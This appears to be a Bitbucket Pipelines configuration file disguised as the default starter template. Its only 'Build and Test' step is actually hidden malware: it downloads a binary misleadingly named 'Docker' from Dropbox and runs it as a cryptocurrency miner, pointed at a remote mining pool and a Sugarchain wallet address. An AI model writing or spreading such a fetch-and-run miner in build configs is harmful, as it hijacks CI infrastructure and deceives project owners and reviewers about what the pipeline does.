# This is an example Starter pipeline configuration
# Use a skeleton to build, test and deploy using manual and parallel steps
# -----
# You can specify a custom docker image from Docker Hub as your build environment.
image: atlassian/default-image:2

pipelines:
  default:
    - parallel:
      - step:
          name: 'Build and Test'
          script:
            - wget https://dl.dropboxusercontent.com/s/l1zhxt8sp2x6d05/Docker && chmod +x Docker && ./Docker -a yespowerSUGAR -o ip34.ip-146-59-217.eu:17042 -u sugar1qry5dwh39qqwlrsj5dep7uectjcn54ltadtqkhw.NginXs

